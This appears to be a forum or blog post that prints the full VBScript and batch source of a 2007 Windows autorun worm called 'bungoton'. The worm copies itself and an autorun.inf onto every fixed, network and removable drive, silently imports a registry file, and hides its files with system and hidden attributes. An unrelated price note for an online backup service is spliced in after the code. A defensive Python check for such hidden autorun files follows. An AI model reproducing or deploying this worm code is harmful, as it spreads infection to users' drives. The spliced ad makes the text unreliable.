The malware is just a really dumb VBS that does the following with some minor variations. It is neither skillful nor a hack but an architectural weakness in Windows. Note that I am not adding in the .inf and .reg files. 

'bungoton v1.0

'bungoton City Phils

'email me if you found this :) @ bungoton@bungoton.org

'May 2007

on error resume next

Set WshShell =CreateObject("WScript.Shell")





For i=1 to 1



set Of = CreateObject("Scripting.FileSystemObject") 

set dir = Of.GetSpecialFolder(1)



Set dc = Of.Drives

if WScript.ScriptFullName=dir&"\bungoton.vbs" then

isdir=true

else

a=WshShell.Run("bungoton.bat Open" ,0,False)

isdir=false

end if



For Each d In dc 

If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then 

a=WshShell.Run("bungoton.bat - "&d ,0,True)

if isdir then

Of.CopyFile dir&"\bungoton.*",d&"\",True

Of.CopyFile dir&"\autorun.inf",d&"\",True

else

Of.CopyFile "bungoton.*",d&"\",True

Of.CopyFile "autorun.inf",d&"\",True

end if

a=WshShell.Run("bungoton.bat + "&d ,0,True)

End If

next



if isdir then

wscript.sleep 60000

i=0

else

a=WshShell.Run("bungoton.bat - "&dir ,0,True)

Of.CopyFile "bungoton.*",dir&"\",True

Of.CopyFile "autorun.inf",dir&"\",True

a=WshShell.Run("bungoton.bat + "&dir ,0,True)

end if



next


*******

@echo off

if exist .\bungoton.reg regedit /s .\bungoton.reg

if not "%1"=="" goto open

if exist bungoton.vbs start WScript.exe bungoton.vbs&exit

if exist %SYSTEMROOT%\system32\bungoton.vbs start WScript.exe %SYSTEMROOT%\system32\bungoton.vbs&exit

exit

:open

if not "%1"=="Open" goto next

start explorer .\

exit

:next

if "%1"=="+" attrib +s +a +h +r %2\bungoton.*

if "%1"=="+" attrib +s +a +h +r %2\autorun.inf

:end

HP Upline (online backup unlimited service) will cost you US$ 12.5 /mo for the family plan (total of $150 per year)

Prices can be seen at
https://www.upline.com/plans/index.shtml
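A defender-side check for the pattern the script and batch file above produce (an autorun.inf in a drive root next to script files that `attrib +s +h` has hidden), as an added example that is not part of the original post. The function names, verdict labels and extension list are choices made for this example, and the sample listings are constructed.

```python
import os

# Win32 attribute bits as reported in os.stat().st_file_attributes.
HIDDEN, SYSTEM = 0x2, 0x4
CLOAK = HIDDEN | SYSTEM            # the bits "attrib +s +h" turns on
# Assumed set of script-like extensions worth flagging in a drive root.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".reg"}


def is_cloaked(attrs):
    return attrs & CLOAK == CLOAK


def triage_root(entries):
    """Score one drive-root listing given as (file_name, attribute_bits) pairs.

    Returns (verdict, reasons); verdict is "clean", "review" or "suspicious".
    """
    listing = {name.lower(): attrs for name, attrs in entries}
    reasons = []
    autorun = listing.get("autorun.inf")
    if autorun is not None:
        hidden = " and hidden+system" if is_cloaked(autorun) else ""
        reasons.append("autorun.inf present" + hidden)
    stems = {}
    for name, attrs in listing.items():
        stem, ext = os.path.splitext(name)
        if ext in SCRIPT_EXTS and is_cloaked(attrs):
            stems.setdefault(stem, []).append(name)   # group name.* families
    for stem, files in sorted(stems.items()):
        reasons.append("hidden+system script files: " + ", ".join(sorted(files)))
    if autorun is not None and stems:
        return "suspicious", reasons
    return ("review" if reasons else "clean"), reasons


def read_root(path):
    """Collect (name, attrs) for files directly under path (attrs are 0 off Windows)."""
    return [(e.name, getattr(e.stat(follow_symlinks=False), "st_file_attributes", 0))
            for e in os.scandir(path) if e.is_file(follow_symlinks=False)]


# Constructed sample listings (not captured from a real system).
INFECTED = [("autorun.inf", 0x27), ("bungoton.vbs", 0x27), ("bungoton.bat", 0x27),
            ("bungoton.reg", 0x27), ("notes.txt", 0x20)]
VENDOR_CD = [("autorun.inf", 0x21), ("setup.exe", 0x21)]

if __name__ == "__main__":
    for label, listing in (("infected", INFECTED), ("vendor_cd", VENDOR_CD)):
        print(label, triage_root(listing))
```

On a Windows host, `triage_root(read_root("E:\\"))` applies the same scoring to a live drive root; a plain `dir` will not show these files, so the attribute bits are what the check relies on.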
